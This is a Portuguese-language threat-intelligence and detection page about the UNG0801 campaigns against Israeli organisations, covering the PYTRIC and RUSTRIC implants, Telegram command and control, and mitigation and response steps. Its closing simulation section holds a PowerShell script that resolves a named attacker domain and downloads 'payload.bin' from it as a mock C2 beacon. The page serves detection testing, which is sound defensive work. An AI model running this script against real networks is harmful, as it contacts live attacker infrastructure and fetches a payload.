UNG0801: Atividade de Ameaça Direcionada a Israel Impulsionada por Falsificação de Ícone de AV
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório descreve duas campanhas conectadas que utilizam documentos PDF e Word maliciosos para entregar cargas úteis que imitam ícones de antivírus e têm como alvo organizações israelenses. Um caminho instala o PYTRIC, um implante Python empacotado com PyInstaller, enquanto o outro entrega o RUSTRIC, um implante baseado em Rust lançado por meio de um documento Word com macro habilitada. Ambas as cargas coletam detalhes do host, executam comandos do sistema e investigam software de segurança instalado; o PYTRIC inclui, adicionalmente, funcionalidades destrutivas. A entrega é impulsionada por anexos phishing direcionados e links hospedados na nuvem (incluindo Dropbox), com uso do Telegram para comando e controle.
Investigação
O SEQRITE Labs analisou as iscas de phishing iniciais, extraiu macros incorporadas e reconstruiu a cadeia de carga útil instalada. O PYTRIC foi confirmado como um pacote PyInstaller com rotinas de descoberta de arquivos e apagamento, e os analistas observaram credenciais de bot do Telegram associadas ao Backup2040. O RUSTRIC foi caracterizado como um binário Rust que verifica vinte e oito produtos antivírus e aciona uma carga útil codificada em hexadecimal usando o WMI. A análise de infraestrutura conectou a entrega a um link Dropbox e a um domínio que resolve para um endereço IP anteriormente vinculado a netvigil.org.
Mitigação
Treine os usuários para tratarem anexos de PDF e Word não solicitados com cautela—especialmente arquivos apresentados como ferramentas de segurança ou utilitários relacionados a antivírus. Configure a segurança de e-mails para bloquear documentos com macros e para sinalizar ou restringir URLs que apontem para hosts de armazenamento em nuvem usados para entrega de cargas úteis. Nos endpoints, monitore a execução de PyInstaller, criação de processos WMI incomuns e invocações suspeitas de utilitários embutidos, como whoami, hostname e nslookup. Bloquear domínios e IPs maliciosos identificados pode interromper ainda mais o caminho da infecção.
Resposta
Se a atividade for detectada, isole o sistema afetado, preserve dados voláteis e colete os documentos maliciosos para triagem baseada em hash. Interrompa quaisquer processos gerados pelo WMI suspeitos e remova cargas úteis instaladas de locais comuns de preparo, como a pasta de Downloads. Realize validação forense para atividades de exclusão ou apagamento de arquivos, redefina credenciais potencialmente expostas e monitore comunicações subsequentes de C2 do Telegram.
Fluxo de Ataque
Detecções
Possível Abuso de Telegram como Canal de Comando e Controle (via dns_query)
Ver
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via dns)
Ver
Possível Enumeração de Sistema (via cmdline)
Ver
IOCs (SourceIP) para detectar: UNG0801: Acompanhamento de Grupos de Ameaças obcecados por Falsificação de Ícone de AV visando Israel
Ver
IOCs (DestinationIP) para detectar: UNG0801: Acompanhamento de Grupos de Ameaças obcecados por Falsificação de Ícone de AV visando Israel
Ver
IOCs (HashSha256) para detectar: UNG0801: Acompanhamento de Grupos de Ameaças obcecados por Falsificação de Ícone de AV visando Israel
Ver
Comunicação C2 Usando Domínio e IP Específicos [Conexão de Rede do Windows]
Ver
Detecção de Execução de PDF Malicioso e Implante na Operação IconCat [Criação de Processo do Windows]
Ver
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria e Linha de Base deve ter passado.
Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa de Ataque & Comandos:
O adversário pré-registrou o domínio stratioai.org e o configurou para resolver para 159.198.68.25 (um servidor VPS comprometido). Usando um comando PowerShell de uma linha, eles iniciam um beacon C2 que baixa uma pequena carga útil e então mantém uma shell reversa persistente. A conexão de saída é feita sobre HTTPS (porta 443) para se misturar ao tráfego normal, mas os logs do firewall registram o IP de destino e a consulta DNS, satisfazendo a regra sigma. -
Script de Teste de Regressão:
# ------------------------------------------------- # Beacon C2 simulado para validação de detecção # ------------------------------------------------- # 1. Resolva o domínio malicioso (força consulta DNS) $maliciousDomain = "stratioai.org" $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain) Write-Host "Resolved $maliciousDomain to $($resolved -join ', ')" # 2. Estabeleça conexão HTTPS com o IP malicioso (C2) $maliciousIP = "159.198.68.25" $url = "https://$maliciousDomain/payload.bin" try { $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10 Write-Host "C2 request succeeded, size: $($response.ContentLength) bytes" } catch { Write-Error "C2 request failed: $_" } # 3. OPCIONAL: Mantenha o canal aberto por 30 segundos Start-Sleep -Seconds 30 # ------------------------------------------------- -
Comandos de Limpeza:
# Remova quaisquer arquivos temporários (nenhum criado neste script) # Limpe o cache DNS para evitar reutilização acidental ipconfig /flushdns Write-Host "Limpeza completa."